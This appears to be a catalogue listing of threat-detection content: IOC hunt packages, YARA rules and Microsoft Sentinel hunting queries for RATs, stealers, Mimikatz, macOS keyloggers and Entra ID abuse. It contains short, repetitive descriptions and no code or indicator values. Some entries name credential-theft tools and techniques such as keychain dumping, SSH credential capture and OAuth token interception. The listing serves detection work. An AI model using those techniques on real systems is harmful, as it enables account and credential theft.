iocthreatfoxunknown
ThreatFox source
DnsEventsUrlClickEvents

Hunt package for 11 IOCs associated with Unknown Stealer

infostealeriocthreatfoxunknown_stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with AsyncRAT

backdooriocthreatfoxwin-asyncrat
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Cobalt Strike is

cobalt-strikeiocthreatfoxwin-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 6 IOCs associated with DCRat

backdooriocthreatfoxwin-dcrat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 3 IOCs associated with Xtreme RAT

backdooriocthreatfoxwin-extreme_rat
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Eye Pyramid

iocthreatfoxwin-eye_pyramid
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with Havoc

iocthreatfoxwin-havoc
ThreatFox source
DnsEvents

Hunt package for 5 IOCs associated with Lumma Stealer

infostealeriocthreatfoxwin-lumma
ThreatFox source
DnsEvents

Hunt package for 4 IOCs associated with Nanocore RAT

backdooriocthreatfoxwin-nanocore
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEvents

Hunt package for 8 IOCs associated with Remcos

iocthreatfoxwin-remcos
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 2 IOCs associated with SectopRAT

backdooriocthreatfoxwin-sectop_rat
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEventsDnsEventsUrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information via encrypted channels, often leveraging stolen

iocthreatfoxwin-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLogDeviceNetworkEvents

Hunt package for 12 IOCs associated with VShell

iocthreatfoxwin-vshell
Yara-Rules source

Adupib SSL Backdoor

backdoorcommunity
Dipsind Family
yara low
Yara-Rules source

Dipsind Family

community
Yara-Rules source

The Trojan

community
Dipsind variant
yara low
Yara-Rules source

Dipsind variant

community
Yara-Rules source

Installer component

community
Yara-Rules source

Raw-input based keylogger

communityinfostealer
Yara-Rules source

Keylogger component

communityinfostealer
Yara-Rules source

Hook-based keylogger

communityinfostealer
Yara-Rules source

Loader / possible incomplete LSA Password Filter

community
Yara-Rules source

Variant of the JPin backdoor

backdoorcommunity
Yara-Rules source

Hotpatching Injector

community
Yara-Rules source

Installer component

community
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 172-86-72-167

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 172-86-73-37

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 172-86-89-57

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 172-86-89-92

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 172-86-91-40

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 44 malicious URLs tagged as 32-bit

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as 45-61-150-97

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 2 malicious URLs tagged as c2-monitor-auto

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 9 malicious URLs tagged as ClearFake

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 17 malicious URLs tagged as elf

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as malware_download

iocurlhaus
URLhaus source
CommonSecurityLogDnsEvents

Hunt package for 6 malicious URLs tagged as Mozi

iocurlhaus
Zlib Backdoor
yara low
Yara-Rules source

YARA rule: Zlib_Backdoor

backdoorcommunity
Yara-Rules source

The YARA rule 'OPCLEAVER_antivirusdetector' identifies a

backdoorcommunity
Yara-Rules source

Keylogger used by attackers in Operation Cleaver

backdoorcommunityinfostealer
Yara-Rules source

Backdoor used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

ARP cache poisoner used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

The YARA

backdoorcommunity
Yara-Rules source

Keylogger used by attackers in Operation Cleaver

backdoorcommunityinfostealer
Yara-Rules source

Mimikatz Wrapper used by attackers in Operation Cleaver

backdoorcommunitycredential-theft
Yara-Rules source

Net Crawler used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Parviz developer known from Operation Cleaver

backdoorcommunity
Yara-Rules source

Parviz tool used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Parviz tool used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Shell Creator used by attackers in Operation Cleaver to create ASPX web shells

backdoorcommunitywebshell
Yara-Rules source

Malware or hack tool used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Malware or hack tool used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Tiny Bot used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Backdoor used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Network tool used by Iranian hackers and used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Hack tool used by attackers in Operation Cleaver

backdoorcommunity
Yara-Rules source

Mimikatz wrapper used by attackers in Operation Cleaver

backdoorcommunitycredential-theft
Yara-Rules source

Keywords used by attackers in Operation Cleaver

backdoorcommunity
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

The detection rule identifies suspicious file

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

huntingmicrosoftofficial
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
ThreatFox: Mirai IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 11 IOCs associated with Mirai

elf-mirai, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 75 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
DnsEvents

Hunt package for 6 IOCs associated with IClickFix

ioc, js-iclickfix, threatfox
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 39 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, UrlClickEvents

Hunt package for 2 IOCs associated with Unknown Stealer

infostealer, ioc, threatfox, unknown_stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 7 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 16 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 5 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox: Havoc IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with Havoc

ioc, threatfox, win-havoc
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 4 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with SectopRAT

backdoor, ioc, threatfox, win-sectop_rat
ThreatFox source
DnsEvents

StrelaStealer is a data-stealing malware that exfiltrates credentials, system information, and sensitive files via encrypted communication with command-and

infostealer, ioc, threatfox, win-strelastealer
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

ValleyRAT is a remote access trojan designed for

backdoor, ioc, threatfox, win-valley_rat
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 20 IOCs associated with VShell

ioc, threatfox, win-vshell
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 7 malicious URLs tagged as 195-96-132-13

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 44 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 5 malicious URLs tagged as 45-198-224-8

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as 95-164-6-120

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 6 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as d52f85

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 15 malicious URLs tagged as elf

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 3 malicious URLs tagged as malware_download

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 4 malicious URLs tagged as Mozi

ioc, urlhaus
APT NGO wuaclt
yara low
Yara-Rules source

YARA rule: APT_NGO_wuaclt

apt, community, ngo_wuaclt
Yara-Rules source

YARA rule: APT_NGO_wuaclt_PDF

apt, community, ngo_wuaclt
Yara-Rules source

YARA rule: Backdoor_APT_Mongal

apt, backdoor, community
Azure-Sentinel source
T1568.002, T1567.002
DeviceNetworkEvents

This query identifies outbound connections to decentralized Web3 C2s, TryCloudflare tunnels, and abused SaaS platforms associated with the EtherRAT, TukTuk, and Gentlemen ransomware intrusion chains.

backdoor, hunting, microsoft, official, ransomware
Azure-Sentinel source
T1204.002, T1574.002
DeviceFileEvents

This query detects the presence, creation, or execution of known payloads involved in the EtherRAT, TukTuk, and Gentlemen ransomware intrusion chains.

backdoor, hunting, microsoft, official, ransomware
Azure-Sentinel source
T1098
AuditLogs

Identifies Entra ID user accounts converted from Guest to Member type, which grants full member-level access and may indicate an attacker elevating a compromised guest account to persistent tenant acc

hunting, microsoft, official
Azure-Sentinel source
T1486, T1204
DeviceFileEvents

Identifies file creation or modification events matching SHA256 hashes associated with an Apache ActiveMQ exploit, defense evasion scripts, and LockBit ransomware deployment.

evasion, exploit, hunting, microsoft, official, ransomware
Mirage
yara low
Yara-Rules source

Mirage

community
Mirage APT
yara low
Yara-Rules source

YARA rule: Mirage_APT

apt, community
Yara-Rules source

Mirage Identifying Strings

community
Molerats certs
yara low
Yara-Rules source

YARA rule: Molerats_certs

backdoor, community
Mongal
yara low
Yara-Rules source

Mongal

community
Yara-Rules source

Mongal code features

community
Yara-Rules source

Mongal Identifying Strings

community
Azure-Sentinel source
T1098.001
AuditLogs

Identifies additions of new owners to Entra ID service principals. SP ownership grants full credential management capability; an attacker who adds themselves as owner can subsequently add credentials

credential-theft, hunting, microsoft, official
Azure-Sentinel source
T1528
AuditLogs

Identifies modifications to OAuth application redirect URIs in Entra ID. Adding a redirect URI controlled by an attacker allows interception of OAuth authorization codes, enabling token theft from use

hunting, microsoft, official
Azure-Sentinel source
T1098.003, T1136.003
AuditLogs

Identifies directory role assignments to accounts created less than 24 hours earlier in the same tenant. An account receiving a privileged role shortly after creation may indicate a backdoor account s

backdoor, hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceNetworkEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219
DeviceProcessEvents

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1219

Remote Monitoring and Management (RMM) programs are used by IT to manage remote endpoints. Attackers have begun to abuse these programs to persist or provide C2 channels. https://github.com/jischell-msft/Remo

hunting, microsoft, official
Azure-Sentinel source
T1556.006, T1098
AuditLogs

Identifies Temporary Access Pass creations in Entra ID. A TAP allows passwordless authentication and bypasses existing credential requirements. Creation outside a managed onboarding process may indica

credential-theft, evasion, hunting, microsoft, official
ThreatFox: Evilginx IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 2 IOCs associated with Evilginx

elf-evilginx, ioc, threatfox
ThreatFox: XMRIG IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 4 IOCs associated with XMRIG

elf-xmrig, ioc, threatfox
ThreatFox source
DnsEvents

Hunt package for 78 IOCs associated with ClearFake

ioc, js-clearfake, threatfox
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents, DnsEvents, UrlClickEvents

Hunt package for 27 IOCs associated with Unknown malware

ioc, threatfox, unknown
ThreatFox source
DnsEvents

Hunt package for 3 IOCs associated with ACR Stealer

infostealer, ioc, threatfox, win-acr_stealer
ThreatFox: AsyncRAT IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceFileEvents, DeviceNetworkEvents

Hunt package for 8 IOCs associated with AsyncRAT

backdoor, ioc, threatfox, win-asyncrat
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 10 IOCs associated with Cobalt Strike

cobalt-strike, ioc, threatfox, win-cobalt_strike
ThreatFox: DCRat IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 3 IOCs associated with DCRat

backdoor, ioc, threatfox, win-dcrat
ThreatFox source
DnsEvents, UrlClickEvents

Hunt package for 12 IOCs associated with Latrodectus

ioc, threatfox, win-latrodectus
ThreatFox source
DnsEvents

Hunt package for 2 IOCs associated with Nanocore RAT

backdoor, ioc, threatfox, win-nanocore
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 16 IOCs associated with Quasar RAT

backdoor, ioc, threatfox, win-quasar_rat
ThreatFox: Remcos IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents, DnsEvents

Hunt package for 10 IOCs associated with Remcos

ioc, threatfox, win-remcos
ThreatFox: Vidar IOCs
ioc-hunt high
ThreatFox source
DnsEvents, UrlClickEvents

Vidar is a data exfiltration malware that steals credentials and sensitive information by leveraging compromised systems. It typically arrives via phishing emails containing malicious attachments or URLs that redirect to command-and-control servers. SOC analysts should monitor for unusual outbound traffic

ioc, threatfox, win-vidar
ThreatFox: VShell IOCs
ioc-hunt high
ThreatFox source
CommonSecurityLog, DeviceNetworkEvents

Hunt package for 8 IOCs associated with VShell

ioc, threatfox, win-vshell
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 12 malicious URLs tagged as 176-65-139-77

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 20 malicious URLs tagged as 32-bit

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 7 malicious URLs tagged as ClearFake

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 41 malicious URLs tagged as malware_download

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

The Mirai malware family is a botnet that compromises IoT devices by scanning for default credentials and deploying DDoS attacks. It typically arrives via malicious URLs or domains used to distribute exploit kits or phishing payloads. SOC analysts

ioc, urlhaus
URLhaus source
CommonSecurityLog, DnsEvents

Hunt package for 2 malicious URLs tagged as Mozi

ioc, urlhaus
Azure-Sentinel source
T1539, T1550
AADNonInteractiveUserSignInLogs, SigninLogs

Identifies non-interactive sign-ins from a different IP and autonomous system than the preceding interactive sign-in for the same user within a 10-minute window, consistent with AiTM phishing token re

hunting, microsoft, official, phishing
Azure-Sentinel source
T1098.003
AuditLogs, SigninLogs

Identifies actors who perform three or more Entra ID directory role assignments within a ten-minute window, consistent with automated post-compromise persistence. Results are enriched with the actor's

hunting, microsoft, official, persistence
Azure-Sentinel source
T1528, T1078.004
SigninLogs

Identifies successful device code flow sign-ins from autonomous system numbers not seen for the user in the previous 30 days. Consistent with device code phishing: attacker initiates the flow, tricks

hunting, microsoft, official, phishing
Azure-Sentinel source
T1098.001, T1098.003, T1078.004
AuditLogs, SigninLogs

Identifies guest accounts (B2B external identities) initiating high-impact Entra ID operations: role assignments, service principal credentials, policy changes. Guest as initiator suggests a compromis

backdoor, credential-theft, hunting, microsoft, official, persistence
signature-base source

http://www.cvedetails.com/cve/cve-2015-5889

exploit, florian-roth
signature-base source

tpwn exploits a null pointer dereference in XNU to escalate privileges to root.

exploit, florian-roth
signature-base source

For reading OS X keychain passwords as root.

florian-roth
signature-base source

Dirty user level command line keylogger hacked together in Swift.

florian-roth, infostealer
signature-base source

A simple and easy to use keylogger for macOS.

florian-roth, infostealer
signature-base source

A simple keylogger for macOS.

florian-roth, infostealer
signature-base source

A simple keylogger for macOS.

florian-roth, infostealer
signature-base source

A simple keylogger for macOS.

florian-roth, infostealer
signature-base source

LogKext is an open source keylogger for Mac OS X, a product of FSB software.

florian-roth, infostealer
signature-base source

ofxKeylogger keylogger.

florian-roth, infostealer
signature-base source

It is a simple and easy to use keylogger for macOS written in Swift.

florian-roth, infostealer
signature-base source

MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers.

florian-roth
signature-base source

Pulls iCloud Contacts for an account. No dependencies. No user notification.

florian-roth
signature-base source

This program decrypts / extracts all authorization tokens on macOS / OS X / OSX.

florian-roth
signature-base source

Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X.

florian-roth
signature-base source

chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner.

credential-theft, florian-roth
signature-base source

Keychain dumping utility.

florian-roth
signature-base source

Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains

florian-roth
signature-base source

Intercepts SSH connections to capture credentials.

apt, credential-theft, florian-roth
signature-base source

masscan is a performant port scanner; it produces results similar to nmap.

florian-roth
signature-base source

Allows for TCP tunneling over HTTP

florian-roth
signature-base source

https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/

florian-roth
signature-base source

A tool for injecting arbitrary code into running Python processes.

florian-roth
signature-base source

Responder is an LLMNR, NBT-NS and mDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server.

florian-roth
signature-base source

https://foxglovesecurity.com/2016/01/16/hot-potato/

florian-roth
signature-base source

Mimikatz credential dump tool: Author copyright

credential-theft, florian-roth
signature-base source

Mimikatz credential dump tool: Error messages

credential-theft, florian-roth
signature-base source

Mimikatz credential dump tool: Files

credential-theft, florian-roth
signature-base source

Mimikatz credential dump tool: Modules

credential-theft, florian-roth
signature-base source

Mimikatz credential dump tool

credential-theft, florian-roth
signature-base source

creddump is a Python tool to extract credentials and secrets from Windows registry hives.

credential-theft, florian-roth
signature-base source

